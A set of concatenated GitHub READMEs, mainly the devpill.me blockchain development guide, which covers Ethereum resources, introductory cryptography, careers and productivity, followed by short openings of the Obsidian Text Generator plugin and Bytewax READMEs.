Layer-2 scales Layer-1 by increasing capacity without significantly changing the security assumptions of the Layer-1. Although this does not change L1 itself, it does influence the general scaling design direction, generally pushing Ethereum into a rollup-centric roadmap.
Domains:
- Side-chains: EthHub, eth org
- State channels: EthHub, eth org
- Plasma (mostly deprecated): EthHub, eth org
- Rollups intro by Polynya
- ZK rollups (ZKRUs): EthHub, eth org
- Optimistic rollups (ORUs): EthHub, eth org
- Bridges: eth org intro
- L3 / validiums / volitions, etc.:
  - starkware L3
  - Validium eth org intro

Refer to L2beat.com for an overview of active L2 scaling solutions.

L1

Domains:
- Eth1 / execution layer
  - Networking: devp2p
  - EVM
  - Tx pool
  - Sync methods (Fast, Snap, Archive, Beam, Light)
  - State DB
  - User-facing (JSON RPC, tx tracing, etc.)
- Eth2 / consensus layer
  - Networking: libp2p
  - Fork-choice
  - Attestations / BLS aggregation
  - Staking / Validator clients
  - Slashings
  - Sharding

News

A selection of protocol news resources:
- Week in Ethereum: the OG weekly newsletter
- Eth2.News: eth2 news by Ben Edgington

Communication
- Discord Eth R&D server
- Eth magicians, forum for governance / protocol discussion
- Eth research, forum for research discussion
- AllCoreDevs (ACD): Discord channel in R&D
- Ethereum Foundation YouTube channel (streams ACD and Consensus calls)

L1 Specifications

Execution layer:
- Ethereum Improvement Proposals: EIPs
- Execution APIs
- New Execution py-specs

Consensus layer:
- Consensus specs
- Beacon APIs, also see the interactive site
- Annotated specs by Vitalik Buterin
- Eth2 book: extended annotated specs with some eth2 history, by Ben Edgington

Legacy (but good) resources:
- Proof Of Stake F.A.Q.
- Sharding F.A.Q.
- Ethereum sharding research compendium

Ethereum core teams

Client teams (those that are open-source), in no particular order:

| Domain      | Project                  | Language      | Discord     | Docs |
|-------------|--------------------------|---------------|-------------|------|
| Eth2        | Prysm                    | Go            | invite      | docs |
| Eth2        | Lighthouse               | Rust          | invite      | docs |
| Eth2        | Lodestar                 | Typescript    | invite      | docs |
| Eth1 + Eth2 | Nimbus eth2 and eth1     | Nim           | invite      | docs |
| Eth2        | Teku (Artemis + Harmony) | Java / Kotlin | invite      | docs |
| Eth1        | Go-ethereum              | Go            | invite      | docs |
| Eth1        | Nethermind               | C#            | invite      | docs |
| Eth1        | Besu                     | Java          | invite      | docs |
| Eth1        | ethereum-JS              | Javascript    | invite      | docs |
| Eth1        | Erigon                   | Go            | Invite-only | docs |

Computer science / Client development (Geth) / MEV searcher: coming soon. Security engineer: WIP.

Cryptography

Cryptography is the backbone of distributed ledgers. No distributed permissionless system is possible without asymmetric cryptography. If you are interested in building decentralized applications, it's essential to understand the wallet generation and transaction signing processes, both of which rely heavily on underlying cryptographic protocols. Throughout this section, I provide a wide array of information about cryptography. DISCLAIMER: While playing with these algorithms on your own is a great way to learn, you NEVER want to use your own cryptographic protocols in a production environment. The existing libraries have been well-vetted and battle-tested over many years. Because cryptography is complex by design, attempting to build your own cryptographic protocols is incredibly dangerous.

What is cryptography

Cryptography is the study of enciphering and deciphering information so as to preserve the privacy of the enciphered data.
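For a first concrete taste of the cryptographic primitives discussed next, here is a tiny sketch of a one-way hash using Python's standard library (this illustrates the hash-function primitive, not a production protocol):

```python
# A one-way cryptographic hash: the same input always yields the same
# digest, but the digest cannot feasibly be inverted back to the input.
import hashlib

digest = hashlib.sha256(b"hello world").hexdigest()
print(digest)  # 64 hex characters, i.e. 256 bits
```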
Modern cryptography is mathematically robust and plays a critical role in securing sensitive information like your bank account numbers and social security number. While the mathematics may seem complex and intimidating, the concepts are graspable even without completely understanding the encryption algorithms. Cryptography is made up of a collection of primitives that serve as building blocks for different cryptographic protocols. Examples of cryptographic primitives include hash functions such as SHA-256 and MD5 (one-way maps) and verifiable random functions (VRFs). True randomness is extremely difficult to capture, but mathematicians have developed ways to construct pseudorandomness that is indistinguishable from true randomness. These primitives are used to build more robust tools like ciphers. Ciphers are algorithms used to conceal (encrypt) and reveal (decrypt) information. The encrypted data is called ciphertext, while the decrypted information is called plaintext. There are two general categories of ciphers: symmetric and asymmetric. We will go into the differences and some examples throughout this section.

Symmetric Ciphers

A cipher is symmetric when the same key used to encrypt information is also used to decrypt it, hence the key symmetry. A simple example of this is the XOR cipher. To encrypt with an XOR cipher, you simply XOR the bits of the key with the bits of the plaintext; to decrypt the ciphertext, you XOR the same key with the ciphertext (a short code sketch follows at the end of this passage). I have provided an XOR truth table below for convenience.

| A | B | A XOR B |
|---|---|---------|
| 0 | 1 | 1       |
| 0 | 0 | 0       |
| 1 | 1 | 0       |
| 1 | 0 | 1       |

NOTE: this cipher is broken if the same key is used more than once. See this article for the details.

Other examples of symmetric ciphers include substitution ciphers like Caesar's Cipher and transposition/permutation ciphers. Both are easily broken by frequency analysis, as are most monoalphabetic (one-alphabet) symmetric ciphers. There are symmetric ciphers that have not been broken; a good example is the Advanced Encryption Standard, or AES, though its security relies on having a sufficiently large key size. Symmetric ciphers are appropriate until you need to send a key securely over a communication channel. You and the receiving party must share a key to exchange private information over a secure channel, and you can see the chicken-or-egg problem forming: how do you securely share the key?

Asymmetric Ciphers

The ciphers that distributed ledgers rely on today are asymmetric ciphers. Asymmetric ciphers address the key exchange problem presented above by using a different key to encrypt information than to decrypt it. These keys are known as the public and private key pair. The asymmetric cryptosystem is only possible because of a mathematical relationship between the public and private key pair. The first breakthrough in asymmetric cryptography was the Rivest-Shamir-Adleman (RSA) cipher, named after its creators. The security of RSA relies on the fact that factoring the product of two large primes is hard (the integer factorization problem). These ciphers allow anyone to encrypt information intended for you with your public key, but only you can decrypt it with your private key. While RSA was a breakthrough in cryptography, it was computationally not as fast as some of the leading symmetric ciphers at the time.
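Before moving on, here is the XOR-cipher sketch promised in the symmetric-cipher discussion above. Per the disclaimer at the start of this section, this is educational only:

```python
# Toy XOR cipher. Educational only: never roll your own crypto in
# production, and never reuse the key; a repeated XOR key is easily broken.
import secrets


def xor_cipher(data: bytes, key: bytes) -> bytes:
    # XOR each byte of the message with the corresponding key byte.
    return bytes(d ^ k for d, k in zip(data, key))


plaintext = b"attack at dawn"
key = secrets.token_bytes(len(plaintext))  # one-time random key

ciphertext = xor_cipher(plaintext, key)
# Decryption is the same operation with the same key (key symmetry):
assert xor_cipher(ciphertext, key) == plaintext
```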
Because of this speed gap, RSA was used to securely share a symmetric key, after which the faster symmetric cipher took over. RSA remained the state of the art until a class of curves, first studied roughly two millennia ago by Diophantus, was explored for a better approach. There is an algebraic structure called a finite field, in which the elements obey slightly more abstract rules than ordinary arithmetic on the real numbers. Over such a field you can define a group of rational points on a curve, given that you can define addition (and, by repetition, scalar multiplication) between these points such that the results remain rational points on the curve. The class of curves used for asymmetric cryptography is called elliptic curves; they follow the general equation y² = x³ + ax + b, where a and b are constants. How does this relate to hard problems like factoring? It turns out that the discrete log problem in the group of points on an elliptic curve is still very difficult, so we can construct primitives similar to RSA's over elliptic curves. The advantage over RSA is that they are relatively fast at comparable security levels, which is why the vast majority of encrypted internet traffic today relies on elliptic curves. Details on the parameters of curve P-256 can be read here. If you are curious how the addition and multiplication operators are defined over these curves, I recommend this reading.

Digital Signatures

With asymmetric cryptography, we can create a new cryptographic primitive called a digital signature. Say you want to prove that you hold the private key corresponding to a public key (to authorize a transaction). A simple way to think about this: encrypt information with your private key and let anyone use your public key to decrypt it, proving the message could only have come from you. The Elliptic Curve Digital Signature Algorithm (ECDSA) is slightly more complex and requires a reliable source of randomness as one of its parameters. Nonetheless, this is how you authorize (send) a transaction from your wallet: you sign the transaction with your private key (revealing no information about the key) to prove you have the authority to authorize it. You can now see how anyone with your private key can authorize transactions on your behalf. Not your keys, not your crypto.

Wallet generation in Ethereum

To generate a wallet address in Ethereum, you first generate a 256-bit private key from a cryptographically secure source of randomness. Then you use elliptic curve cryptography (on the secp256k1 curve) to derive the corresponding public key. Finally, you hash the public key with keccak256 and keep the last 160 bits as the address. With a 256-bit key, the odds of someone generating a private key already in use (a collision) are on the order of 2^-256, which is computationally infeasible.

Protocol development

Coming soon.

Blockchain data analytics (provisional)

This section will primarily cover EVM-based chains for now. Getting started with data analytics in web3 is really easy: everything is standardized, there are tons of visualization/explorer tools, and most of the existing analysis in the space is fully open source. No matter your background and experience level, I recommend starting your analytics journey with SQL; it's the easiest to work with and share by far.

Resources for getting started:
- A guide to how to think about web3 data, the tools you'll need across the data stack, and some skills/roles that are common in the space.
- For the basics of both SQL and Ethereum, start here.
- Once you're comfortable with those, move on to the intermediate material here.
- If you're comfortable with contract tables and want to dive deeper into the base data tables (transactions, logs, traces), check out this complete breakdown of an Ethereum transaction (including proxy patterns).
- A lot of event and call data analytics relies on aggregations to get to the most current state. Skip that noise and go to storage and state data analysis when you're ready (this will require you to learn some Solidity).
- To fully dive in and become a web3 analyst, check out the OurNetwork Learn 30-day data course, with videos that cover a multitude of topics.
- Once you're ready to start applying to roles, one place to start is this talent board for a chance to get 1:1 help finding a role.

Beginner-friendly orgs to start getting involved in:
- MetricsDAO (runs workshops and bounties weekly)
- Index Coop (lots of broad protocol analytics to learn from)
- Dune Wizards (lots of helpers, and some harder bounties)
- Flipside Gunslingers (lots of helpers, and more focus on cross-chain work like Harmony, Terra, Solana, etc.)

Some data feeds to follow to keep updated on the newest analysis in the space:
- Dune Digest & Podcast
- OurNetwork Weekly Data Newsletter

Application-based development: coming soon. DeFi: WIP (Lending/Borrowing, DEXs, Yield aggregators). MEV: coming soon (The Dark Forest, Frontrunning, Backrunning). Creator economy: coming soon. Gaming development: coming soon. Coordination / Public Goods: coming soon.

Getting a job

Once you have a solid foundational skillset within blockchain development, you can start looking for junior positions in your area of interest. One of the best parts of web3 is that many projects have open-source codebases, which makes them much easier to contribute to. There are various structures in web3 that allow a developer to get paid for their work, among them:
- working for a company that is building a web3 product
- getting grants from Gitcoin or several different DAOs
- being a DAO core contributor and getting paid with bounties

The easiest way to find a job is to be active on the social platforms of the projects you'd like to be hired at or contribute to. For example, if you want to become a smart contract developer at Uniswap, talk to the team on Discord, suggest new features, implement mockups, and apply for a grant; if you are good enough, someone will notice and try to hire you to work full-time within the DAO itself or at Uniswap Labs, the core team leading the smart contract development efforts. The most important things are to show initiative, be proactive, and openly offer to help. If you come across something interesting, don't forget to post it on Twitter or Telegram. In order to find interesting projects to work for, web3 devs look at Twitter, as it's the place where everything unfolds and where every single project lives. If you build a reputation as a good blockchain developer, you'll start getting DMs from interesting people and projects, as there is an extreme lack of talent in the space and insatiable demand for good developers.

Portfolio

In order to become a good job candidate, it is almost imperative to have a portfolio of projects you've built, to showcase the skills you have, the technologies you use, and your thought processes behind solving different problems.
For example, if you are interested in building DeFi applications, you can showcase that by writing a demo of an AMM, a yield aggregator, a money market, etc. The more high-quality demo projects you have, the better, as these act as valuable signals for teams looking to hire. The most popular way to showcase your projects is to publish them publicly on GitHub. If you don't know what to build, you can look at the problems different projects are facing, try solving one of them, and publish the solution as a public repo on GitHub. You can also build demo projects from sites like SpeedRunEthereum using templates like scaffold-eth, and much more.

Job boards

The two most used platforms for finding crypto/web3 jobs are Twitter and a few select job boards. The main job boards used by recruiters and workers are:
- crypto.jobs
- cryptojobslist.com
- bankless job pallet
- web3 career
- cryptocurrencyjobs
- web3 pallet
- useweb3 jobs
- web3 board
- defi jobs

Twitter

Twitter is the place to find a blockchain development job; LinkedIn is rarely used for hiring talent in the space, although it's not unheard of either. As most of web3/crypto culture resides on Twitter, it is a natural place for developers, founders, creators, and users to hang out together. The more value you provide to the community, the larger your following, and therefore the greater your reach as a developer. All teams are hungry for good developers, so the more relevant followers you have, the better your chances of being discovered by a team looking to hire a blockchain developer in your field of expertise. Building up your Twitter reputation can propel you forward more than you'd expect; a lot of friendships, partnerships, and collaborations have been initiated through Twitter, and it is currently the place where social value (clout) in the space is accounted for. If you manage to demonstrate mastery of any given skill within web3, you are all but guaranteed a position, as all teams are looking for talent. If you are just starting out but show strong drive and initiative to learn, many teams will take you under their wing to level up your skills, letting you get your hands dirty and learn while building as you go. By being active on relevant social platforms like Twitter, Discord, and Telegram and socializing with the right people, finding a job becomes relatively easy, as everyone is looking to hire talent.

Mastery

Introduction

This mastery section will discuss several soft skills that will help you master any skillset. It is vital not to get stuck in the wrong mindset when learning the skills required to become a great blockchain developer. It is not only about going to a few websites, reading course material, working out some problems, and building applications. Various soft skills, which often go unnoticed or are ignored, will assist you during your journey.

Learning how to learn

Many people focus on the skillsets they need to learn and all the information they need to consume. Rarely do people stop to think about how to learn effectively, so that every minute spent on course material yields maximum retention with minimum time spent. This section is inspired by Barbara Oakley's book Learning How to Learn.

Lessons from the book

These notes are extracted from this summary of the book. I strongly recommend reading the book or taking Barbara Oakley's Coursera course.
- When you find yourself struggling to solve a problem or learn anything new, try to relax for a few minutes, and then try again later.
- Procrastination gives you instant pleasure, but it hurts you long-term and makes you highly unproductive.
- Think in metaphors to learn faster.
- Learning has no age: even adults in their 40s or 50s can learn new things.
- Sleep is important for your brain connections to become stronger and sturdier.
- Use memory palaces to remember cold hard facts.
- Exercise is good not only for your body but also for your brain.
- Neurons are sophisticated tiny computers in your brain.
- Focus on different aspects while studying a new subject.

More resources on learning how to learn:
- Barbara Oakley's Coursera course
- How to Learn Anything FASTER - Ali Abdaal

How to take notes efficiently

When you constantly have to consume lots of learning material, it is tough to learn effectively and in a way your brain can retain for long. If you want to master any given topic, it is good to write notes as you learn, especially in a digital format that you can easily query to refresh your memory of the material. If you write practical notes, your brain is forced to think about the subject at hand and more easily synthesizes the ideas and learnings. Retention is also heightened when you take good notes, since your recollection of a subject improves when you focus on the essential parts of the material.

A great book for improving at notetaking is How to Take Smart Notes: One Simple Technique to Boost Writing, Learning and Thinking - for Students, Academics and Nonfiction Book Writers by Sönke Ahrens (Amazon link). The book is inspired by the German notetaking method Zettelkasten.

Core principles of How to Take Smart Notes:
- Writing is not the outcome of thinking; it is the medium in which thinking takes place
- Do your work as if writing is the only thing that matters
- Nobody ever starts from scratch
- Our tools and techniques are only as valuable as the workflow
- Standardization enables creativity
- Our work only gets better when exposed to high-quality feedback
- Work on multiple, simultaneous projects
- Organize your notes by context, not by topic
- Always follow the most interesting path
- Save contradictory ideas

If you don't want to read the book, you can read a summary of it and try to apply its principles to your personal notetaking approach (link). Next, let's explore different notetaking applications and what they are suitable for.

Notion

Notion is a great notetaking tool for all sorts of things: taking notes on a topic you are trying to master, managing complex projects with your team, creating a knowledge base, managing your daily tasks, and much more.

How to use Notion

Here are some external resources for learning how to use Notion. Feel free to submit a pull request to the guide or the devpill.me site with suggestions for more resources.
- 10X your Productivity as a Developer with Notion - Clever Programmer
- Notion Mastery - Marie Poulin
- Keep Productive - YouTube
- Civics Unplugged Notion use cases
- Self-development use case: Gary Sheng's Leadership Blueprint

Roam Research

Roam Research is a notetaking app that leverages the structure of graphs to synthesize and connect different notes and pieces of knowledge by referencing concepts across notes. You can link different ideas in both directions and create mind maps for anything you learn. Roam Research is a subscription-based paid application ($15 per month or $165 per year).
You can also apply for a scholarship to use Roam for free if you are a researcher, under 22, or experiencing financial distress (link to apply). It is a great way to create structure for any learning material, whether about Solidity, MEV, DeFi, protocol design, public goods, or anything else, and a handy way to reference concepts, check where else you have referenced them, and expand on each note you take.

How to use Roam Research
- Beginner's Guide to Roam Research - Keep Productive
- This Note-Taking App is a Game Changer - Roam Research, by Thomas Frank
- How to Take Better Notes With Roam Research - Lawson Blake

Obsidian

Obsidian is a free alternative to Roam Research that hosts your graphs locally. Some add-on features or licenses can be paid for as a subscription or a one-time payment for added functionality. They will also soon release hosted graphs.

How to use Obsidian
- Your Beginner's Guide to Obsidian

Inkdrop

Inkdrop is a Markdown notetaking application that is highly extensible and focused on developers. I use it to write all of my articles, including the devpill.me guide and my article on L2s, among other pieces. I use the Vim extension to write with Vim keybindings, the LaTeX extension to occasionally write math equations, and some other plugins that modify how the application looks. There is a 30-day free trial for the application; otherwise, it costs $50 per year or $6 per month.

Others

For more applications, check out this article from College Info Geek comparing different notetaking apps.

Mentorship

Having guidance is extremely important to grow as rapidly as possible and make the most effective use of your time. I want to share some of the lessons I have learned over the past four years of researching blockchain development and web3; I don't want new developers to feel as overwhelmed by the number of possibilities and the lack of structured guidance as I did. In the crypto and broader web3 ecosystems, thought leaders spearhead different missions, values, and goals and drive the industry forward. When you are just starting out, following these leaders and analyzing how they reached their position is an excellent way to understand what you need to do to achieve your own goals within a particular field. If you are interested in creating useful DeFi primitives, you should analyze exemplary founders and builders of current as well as up-and-coming DeFi protocols; good examples include Hayden Adams (Uniswap), Stani Kulechov (Aave), Robert Leshner (Compound), @scupytrooples (Alchemix), etc.

EthernautDAO

EthernautDAO is a community of builders that tries to convert developers from other fields into blockchain developers through mentorship programs. There are two main types of members in EthernautDAO: mentors and mentees (students). Mentors come from established protocols, DAOs, projects, and companies in the industry and are looking to train and hire skilled developers. The process is relatively simple: a mentor posts an opening for a specific type of mentorship, and students apply. If they get accepted, they receive mentorship and often either compensation or the chance to get hired by the company the mentor belongs to.

Twitter

The leading platform for news, discourse, education, and interaction within the web3 space is Twitter. Almost everyone interacts on Twitter, so as someone looking to learn and get mentorship, it is a great place to try to get hired (take a look at the Getting a job section) and accrue social capital.
As you build a portfolio that showcases your skills, it will act as your reputation in the space. You can leverage that reputation on Twitter to start working on different projects (getting a job) or to interact with skilled individuals who are generally very willing to help people learn and become better (great for getting mentorship).

Development bootcamps

Another option for getting valuable guidance is finding a community of people going through the same challenges you are. You will gain access to experienced builders, excellent educational materials, and more in development bootcamps and e-learning platforms like the ones listed below.

A non-exhaustive list of learning platforms:
- Buildspace (free)
- [Cadena](https://cadena.dev/) (free)
- Encode club (paid)
- Consensys Academy (expensive bootcamp)
- BuidlGuidl (free)
- Learn Web3 (free)

Affiliated (I, dcbuilder, am an advisor):
- Artemis (free / income sharing)
- Crystalize (income sharing)

Mastery

Mastery of a craft can only be achieved when individuals hone their skills to the utmost and become competent experts. To acquire knowledge of a specific skillset, an individual needs to devote a lot of time and concentrated effort to learning the intricacies, nuances, and details of their craft. They also need to assimilate that information into practiced ability, and they need to constantly keep up with the pace of development within the craft to keep their skills state of the art. In the context of blockchain development, this involves:
- Keeping up with the current standard development stacks.
- Looking into newly emerging technologies.
- Developing a deep understanding of the field to critically assess the pros and cons of using a specific technology or architecture.

Many principles behind mastery and the journey toward peak human performance are studied in fields like neurology (for learning-related matters), psychology, physiology, the social sciences, self-development, and more. A good entry book that has remained relevant for decades is Robert Greene's 'Mastery'. It details the steps the most capable people throughout human history have followed to achieve greatness and mastery of their craft. You can find a good summary of the book's principles here. The main sections of the book are:
- Discovering Your Calling
- Submit to Reality: The Ideal Apprenticeship
- Absorb the Master's Power: The Mentor Dynamic
- See People as they Are: Social Intelligence
- Awaken the Dimensional Mind: The Creative-Active
- Fuse the Intuitive with the Rational: Mastery

Becoming a master of blockchain development or its specializations is a never-ending process. However, the possibilities for what you can create are endless, and all of its skillsets are highly valuable and sought after. I'm personally excited about what the masters of the future will be able to build and how that will enable the future of human coordination, public goods, and regenerative crypto-economics.

Rationality

Rationality is the systematic pursuit of truth. A great book about rationality is 'Rationality: From AI to Zombies' by Eliezer Yudkowsky (thank you, Rai, for the recommendation). From the book: "When we talk about rationality, we're generally talking about either epistemic rationality (systematic methods of finding out the truth) or instrumental rationality (systematic methods of making the world more like we would like it to be).
We can discuss these in the forms of probability theory and decision theory, but this doesn't fully cover the difficulty of being rational as a human. There is a lot more to rationality than just the formal theories." The book comprises six smaller sections:
- Book I: Map and Territory
- Book II: How to Actually Change Your Mind
- Book III: The Machine in the Ghost
- Book IV: Mere Reality
- Book V: Mere Goodness
- Book VI: Becoming Stronger

You can read the sections sequentially, as they originally came from blog posts he wrote. Each section goes through different areas of rationality.

Time management

Time management is vital to becoming an efficient developer, especially in crypto / web3, where there are so many distractions and shiny objects that it is hard to focus on essential tasks.

Planning

Planning your days ahead of time is essential to maximizing productivity as a developer, especially if you are a freelancer or don't have a robust synchronous structure within your organization. Since many web3 developers work remotely and teams coordinate asynchronously using tools like GitHub and Zoom / Google Meet, it is essential to book the times you will spend working on a particular task or area. I'd recommend planning your day the day before, filling in the necessary tasks as needed. You will get better at planning the more you do it, as you'll see what works for you and what needs polishing. I try to schedule everything, from travel and bookings to personal affairs, periods for exercising, eating, reading, learning, working, events, calls, meetings, etc. I used to spend way too much time procrastinating and just going through the motions; had I had a system for using my time efficiently, I would not have lost so much time in vain. I've recently started using Cron, a calendar interface that can hook up to Google accounts. The application aggregates the calendars of all your connected Google accounts, sends early notifications for meetings, has an impressive UI/UX, makes booking new events very intuitive, and lets you send invites from any account. For scheduling meetings, I recommend Calendly or similar services that let you give other people links pre-filled with your availability; the people you want to meet can use the link to book a specific time with you, and the event then appears in your calendar app of choice. To get deeper into planning/scheduling and developing high performance, I recommend reading these two books, which are my personal favorites:
- The Power of Habit - Charles Duhigg
- High Performance Habits - Brendon Burchard

Project management

As a software developer, you're going to work with many different people when you join a team or try to build a product yourself: designers, front/back-end devs, DevOps, data engineers, lawyers, product managers, etc. The most mature developer environments will have systems in place to coordinate as an organization. Popular methods are Agile and SCRUM. Popular apps for managing all of these processes, tasks, and interactions include Asana, Linear, Jira, Trello, Notion, etc.

Self-development

To reach your peak, you need to create a sustainable set of habits that will allow you to keep working hard consistently. Since we are all human beings, we need to keep our bodies in check, as they are the hosts for the brains responsible for producing bug-free code.
Note that this section is not professional advice, as I am not an expert in these fields and not a licensed advisor. If you want guidance in any of the areas covered, please consult an expert trainer, nutritionist, therapist, coach, etc.

Working out

Exercise is an integral part of life, as it allows the body to maintain physical fitness, health, and overall wellness. Developers are usually portrayed in modern culture as people who do not exercise very often, as sedentary people who sit in a chair all day and do not prioritize their health. It is essential to be active throughout the day even though we are programming most of the time. I recommend using a standing desk that you can adjust to any height; you can stand up and keep coding when you are tired of sitting. Some individuals also put a small walking pad underneath the desk to walk while coding. Another good technique is a slight modification of the Pomodoro technique that replaces the break period with a short exercise period; the most prevalent version consists of 45 minutes of focused work and a 15-minute workout. I like to alternate activities during the workout period. Other positive effects of exercising include clearer thinking (as the brain gets more oxygen), a stronger immune and cardiovascular system, and more. For more guidance on achieving physical fitness and what exercises to do, please consult an expert.

Nutrition

Nutrition is an area that is very easy to overlook, especially when an individual is young and their metabolism can cope with an unhealthy lifestyle. Eating the right amounts of food within a varied diet is an integral part of a healthy lifestyle, and everyone should take it seriously. For more information, please consult a nutritionist or dietary expert, or do your own research, as nutrition varies a lot between individuals and I'm not qualified to give advice.

Other

Self-development is a very wide topic, and there is a lot more to improve than health, fitness, and nutrition. You can improve your mindset, define your own values, and create systems that allow you to uphold those values as you go about life; there is also spiritual discovery, learning about various aspects of life, etc. Most of these other topics, although significant, do not have a direct impact on your performance as a developer, so I'll refrain from discussing them. Feel free to suggest any changes to this section via a GitHub pull request.

Social Capital

Introduction

Social capital expresses how much influence you have within social circles. Good metrics for social capital include:
- relevant followers across social platforms within the industry
- a reputation formed by building, creating, and contributing to the space
- friends in the space who will help you grow, whom you can learn from and rely on, and with whom you can discuss your ideas and get constructive criticism
- connections with people who can introduce you or vouch for you in different situations
- etc.

There are various methods of accruing social capital, which will be discussed within this guide and expanded upon over time. Most consist of putting out relevant content, networking and interacting with people in the space, building products, contributing to the ecosystem in different ways, providing value (or fun), and many other methods.
In order to meet 'good' people in the space, you also need to spend your time in the right places doing the right things. This guide will help you streamline your focus and save time by not wasting it in places where people are not listening, or in places meant for goals other than accruing social capital. Another important aspect of accruing social capital is putting out content that other people find interesting, engaging, relevant, or valuable. As a developer in the space, your content should provide value to others within the space: to developers and to anyone wanting a more technical overview of the field, products, or projects you're working on. There is also lots of potential to accrue social capital by creating educational resources like trivia, fun facts, guides, tutorials, reviews, talks, discussions, debates, etc. A good example of this is devpill.me itself: by contributing content to this public-good guide, I (dcbuild3r) become known for creating a resource that benefits everyone, and people interested in learning about blockchain development follow me.

How to leverage social platforms to grow as a developer

The most relevant platforms for interacting with people in the space are:

Twitter

Twitter is used for short-form content that either redirects to long-form content (Medium, Mirror, or Substack articles, etc.) or is short enough to fit in a few tweets, unless you write a 206-tweet-long thread (in which case @thereaderapp is useful for making it readable).

Telegram

Telegram is a single-threaded chat platform generally used in crypto for simple group chats and newsletters. As a developer, there are a few groups you can follow within your specific realm of interest, or you can create group chats with friends to discuss various topics, build a learning group around a programming language, protocol, or topic, and more. Telegram is good for simple one-thread conversations where you don't need to manage asynchronous communication.

Discord

Discord groups are useful once there is a big community, DAO, or friend group you want to participate in. For developers, there are various good groups like Buildspace, Developer DAO, and others. Discord is also used by teams to manage contributions to an application, protocol, or service. For example, if you become a contributor to an open-source project like Aave and you recommend a change to one of its codebases that gets accepted, the coordination and all the surrounding processes usually go through Discord. Many projects also help new contributors get started building with the project, and if you are learning something new, it is a good place to ask technical questions.

Real-life events

Although not accessible to everyone, events are hosted all around the world where people from different web3 and crypto communities gather for conferences, hackathons, parties, meetups, talks, and more. Real-life events are among the best places to find like-minded people to befriend, get hired, network with other interesting people in the space, learn, build new projects at hackathons, push your own boundaries, etc. It is underrated just how much you can grow as a developer if you surround yourself with people who have the qualities you want to acquire for yourself.
The people around you can push you to grow and take you to new heights as they expose you to new challenges and help you along the way.

Who to interact with

When you are on the social platforms mentioned above, you should seek out the people who help you grow and make connections with them.

Experts in your preferred field of interest: if you talk to people with expertise in the fields you want to become skilled in, you'll have a much easier time learning them. You'll make good connections that propel your career forward, and you'll most likely gain more opportunities and resources to grow as a developer: getting hired, getting tips on how to learn your specialization efficiently, and more.

People trying to learn the same things you are: it is good to share ideas and get two-way feedback from others learning the same material, especially if they are more experienced than you. Another good reason to learn in groups (ideally pairs) is that teaching is the best way to solidify your own knowledge: to explain a complex topic simply, you need to understand it well. More on this in the Mastery section.

People building other primitives in the web3/crypto space (to expand your horizons): as someone trying to learn more about blockchain development, especially when starting out, it is great to explore at the beginning and try many different things before specializing in any given field. That's why you should follow the most proficient people across different fields to get a bird's-eye view of the space. I also recommend reading the other sections of devpill.me to see what there is to learn.

What content to put out

In order to amass social capital, putting good content out on popular social platforms is crucial, as people like to follow individuals and groups they can get value from. For example, if you start talking about building in DeFi, individuals interested in DeFi will start to follow you, like and retweet your posts, engage in conversations in the comments, etc. As a blockchain developer in any specialization, there are different ways to provide interesting content and distribute it across social platforms.

Document > create at the beginning: when you start out as a blockchain developer, you usually won't have novel findings, cool things you are building, or projects you are working on, so it is good to share your own learning process and your journey toward becoming a blockchain developer.

Talk about what you learn along the way: share the resources you are using to learn the topics you are interested in, explain how they helped you, and provide commentary and helpful tips that might be missed by people who only skim the resources without going into depth.

Talk about the tools you use: developers love to talk about their tooling, the libraries they use, the IDE and extensions they write code with, the services and applications they use daily to organize themselves and stay productive, and much more.
Ask questions about the things you are learning: chances are many people following you have had the same questions in the past, and they can provide you with a lot of helpful insight on any given topic.

Be active in threads that are relevant to your interests: if relevant events are happening within the space, it is a good idea to engage in public discourse around them to get a better overview of what's happening and to extract valuable information and learnings.

Retweet things that happen within your field of interest with commentary and opinions; summarize articles, talks, events, and updates; discuss code within the projects and fields that interest you.

Shitpost (express your own personality / be yourself) for engagement; it grows your network while you have fun. Be creative: development doesn't need to be everything you talk about. Many people also use social platforms to make friends and have fun, so you can post funny content, light-hearted threads on any topic, pictures of your dog, or whatever you want. Expressing your own individuality is also useful for building your personal brand on socials.

Conclusion

Thank you for checking out the blockchain development guide. If there is any content you'd like to see added, please check out the contributors section and suggest it there. The goal is to make this guide and devpill.me the best blockchain development guide out there. Thank you for your support.

Special thanks

Special thanks to all the contributors:
- @protolambda - author of the Ethereum core development section
- @0xjepsen - author of the cryptography section;Devpill.me - A Public Good Blockchain Development Guide;ethereum,blockchain-development,solidity,full-stack,decentralized-finance,mev
dcbuild3r/blockchain-development-guide
nhaouari/obsidian-textgenerator-plugin;obsidian-textgenerator-plugin Documentation • Discord • Twitter

What is Text Generator?

Text Generator is an open-source AI assistant tool that brings the power of Generative Artificial Intelligence to knowledge creation and organization in Obsidian. For example, use Text Generator to generate ideas, attractive titles, summaries, outlines, and whole paragraphs based on your knowledge database. The possibilities are endless! If you're looking for a place to discuss the use cases of this plugin and share your experiences, head over to our Discord Server (updated) or the Discussion. There, you'll find a community of like-minded users who are eager to help you make the most of this powerful tool.

Features

There are many benefits to using the Text Generator plugin, including the following:

Free and Open Source: the Text Generator plugin is free and open source, so you can use it without worrying about licensing fees.

Beside Obsidian: Obsidian is very powerful and extensible Personal Knowledge Management software, so you can use the Text Generator plugin alongside Obsidian to create an even more powerful Personal Knowledge Management system.

Flexible Prompts: building the prompt's context is straightforward using all the available options in the Considered Context, which gives you greater flexibility.

Template Engine: you can create templates to make repetitive tasks more manageable.

Community Templates: through this option you can discover new use cases of Generative Artificial Intelligence using the shared templates, and you can share your own use cases more easily.

Highly Flexible Configuration: using Frontmatter Configuration, it is possible to use different services such as Google Generative AI (including Gemini-Pro), OpenAI, HuggingFace, etc.

Demonstration;Text generator is a handy plugin for Obsidian that helps you generate text content using GPT-3 (OpenAI).;obsidian,obsidian-plugin,plugin,gpt-3,huggingface,nlg,openai,ai,writing,writing-tool
nhaouari/obsidian-textgenerator-plugin
bytewax/bytewax;Python Stateful Stream Processing Framework

Bytewax is a Python framework that simplifies event and stream processing. Because Bytewax couples the stream and event processing capabilities of Flink, Spark, and Kafka Streams with the friendly and familiar interface of Python, you can re-use the Python libraries you already know and love. Connect data sources, run stateful transformations, and write to various downstream systems with built-in connectors or existing Python libraries.

How it all works

